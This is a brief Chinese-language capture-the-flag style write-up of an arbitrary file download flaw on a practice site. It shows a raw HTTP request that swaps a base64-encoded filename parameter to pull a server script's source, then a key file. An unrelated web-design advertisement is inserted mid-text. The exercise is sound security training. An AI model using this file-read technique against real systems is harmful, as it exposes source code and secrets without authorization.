文件下載漏洞練習(xí)（一）

（1）打開網(wǎng)頁

（2）同樣的先抓下包

和順網(wǎng)站建設(shè)公司創(chuàng)新互聯(lián),和順網(wǎng)站設(shè)計制作，有大型網(wǎng)站制作公司豐富經(jīng)驗。已為和順1000+提供企業(yè)網(wǎng)站建設(shè)服務(wù)。企業(yè)網(wǎng)站搭建\外貿(mào)網(wǎng)站制作要多少錢，請找那個售后服務(wù)好的和順做網(wǎng)站的公司定做！

我們注意到：
url=Y2hvdWJhZ3VhaS5tcDM 還有/download.php

先解碼看看是什么

是個文件名

（3）我們試著將其替換成、download.php

GET /download.php?url=ZG93bmxvYWQucGhw= HTTP/1.1
Host: e2ad76b4d4b6d6ed.yunyansec.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://e2ad76b4d4b6d6ed.yunyansec.com/
Accept-Language: zh-CN,zh;q=0.9
Connection: close

（4）文件下載成功，打開后發(fā)現(xiàn)還可以有hereiskey.php下載

同樣先編碼

得到key

當(dāng)前名稱：文件下載漏洞練習(xí)（一）
URL標(biāo)題：http://muchs.cn/article42/jpeihc.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供App開發(fā)、移動網(wǎng)站建設(shè)、電子商務(wù)、營銷型網(wǎng)站建設(shè)、面包屑導(dǎo)航、定制網(wǎng)站

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)